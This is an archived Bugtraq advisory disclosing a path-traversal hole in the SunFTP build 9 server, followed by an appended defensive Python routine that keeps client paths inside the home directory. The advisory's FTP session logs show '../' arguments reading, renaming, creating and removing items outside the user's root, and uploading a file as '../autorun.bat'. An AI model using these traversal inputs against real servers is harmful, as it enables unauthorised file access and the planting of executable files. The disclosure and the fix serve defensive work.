Bugtraq mailing list archives

Sunftp build9(1) - ftp server Vulnerability


From: se00020 () LION CC
Date: Fri, 2 Mar 2001 12:14:23 -0000

It is possible to break out of the root directory by using relative paths.

e:\crap was used as the home directory of user test.

#the get command#


getting files from outside of the root dir.

220 chris FTP Server (SunFTP b9) ready on port 21...
Benutzer (10.17.3.44:(none)): test
331 Password required for test.
Kennwort:
230 User test logged in.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 test.txt
226 File sent ok
FTP: 179 Bytes empfangen in 0,00Sekunden 179000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> get ../sunftptest.txt
200 Port command successful.
150 Opening data connection for ../sunftptest.txt.
226 File sent ok
FTP: 1443 Bytes empfangen in 0,00Sekunden 1443000,00KB/s


#the mkdir command#


without priv. to create directories:

ftp> mkdir test
550 '/test': can't create directory.
ftp> mkdir ../test
257 '/../test': directory created.

hell! it's getting worse...


#the rmdir command#


without any priv. to remove anything

ftp> rmdir ../test
250 '/../test': directory removed.

this only works with empty directories


#the rename command#

It is possible to rename files outside of the root directory without
permissions. And it is also possible to move files with the rename command,
when the filename is known.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
226 File sent ok
FTP: 240 Bytes empfangen in 0,00Sekunden 240000,00KB/s
ftp> cd ..
501 CWD failed. No permission
ftp> rename ../sunftptest.txt movedtohomedir.txt
350 File exists, ready for destination name.
250 File '/../sunftptest.txt' renamed to '/movedtohomedir.txt'.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s


#the put command#

If you have permission to upload files, you can put these files outside of
the homedir.

ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 .
drw-rw-rw-   1 ftp      ftp            0 Feb 28 13:46 ..
-rw-rw-rw-   1 ftp      ftp            0 Mar 02 11:21 grmbl.txt
drw-rw-rw-   1 ftp      ftp            0 Mar 02 12:17 test
-rw-rw-rw-   1 ftp      ftp            6 Mar 02 12:33 movedtohomedir.txt
226 File sent ok
FTP: 314 Bytes empfangen in 0,00Sekunden 314000,00KB/s
ftp> put
Lokale Datei c:\test.txt
Remotedatei test.txt
200 Port command successful.
150 Opening data connection for test.txt.
226 File received ok
ftp> put
Lokale Datei c:\test.txt
Remotedatei ../autorun.bat
200 Port command successful.
150 Opening data connection for ../autorun.bat.
226 File received ok



Solution

no quick bugfix. Use with care 

I tried to contact the authors, but their webpage seems to be down.

se00020 () lion cc or
se00020 () fhs-hagenberg ac at
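
Added example (not part of the original post and not SunFTP code): in the sessions above the server refuses "cd .." but accepts "../" in get, mkdir, rmdir, rename and put, so the check has to sit in one routine that every path-taking command calls. The sketch below shows such a routine; the names resolve, PathEscape and reply_for, the command set and the reply strings are hypothetical.

```python
import ntpath      # Windows path rules, usable on any platform
import posixpath   # FTP virtual paths use "/" separators


class PathEscape(Exception):
    """A client-supplied path resolves outside the home directory."""


def resolve(home, cwd, arg):
    """Map an FTP path argument to a real path under `home`, or raise.

    home: real home directory; cwd: virtual directory ("/" is home);
    arg: raw argument as sent by the client.
    """
    arg = arg.replace("\\", "/")            # Windows accepts both separators
    virtual = arg if arg.startswith("/") else posixpath.join(cwd, arg)
    parts = []
    for seg in virtual.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:                   # would climb above the virtual root
                raise PathEscape(arg)
            parts.pop()
        elif ":" in seg:                    # drive letter or alternate stream
            raise PathEscape(arg)
        else:
            parts.append(seg)
    real = ntpath.normpath(ntpath.join(home, *parts))
    # Defence in depth: the final path must still sit under the home directory.
    root = ntpath.normcase(ntpath.normpath(home))
    if ntpath.commonpath([root, ntpath.normcase(real)]) != root:
        raise PathEscape(arg)
    return real


# Every command that takes a path goes through resolve(), not only CWD.
PATH_COMMANDS = {"CWD", "RETR", "STOR", "MKD", "RMD", "RNFR", "RNTO", "DELE"}


def reply_for(home, cwd, line):
    """Return a placeholder reply: 550 on an escaping path, 200 otherwise."""
    verb, _, arg = line.partition(" ")
    if verb.upper() in PATH_COMMANDS:
        try:
            resolve(home, cwd, arg)
        except PathEscape:
            return "550 Permission denied."
    return "200 OK"
```

String normalisation does not follow symbolic links or junctions; a server that allows them inside the home directory also needs to compare the resolved on-disk path.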

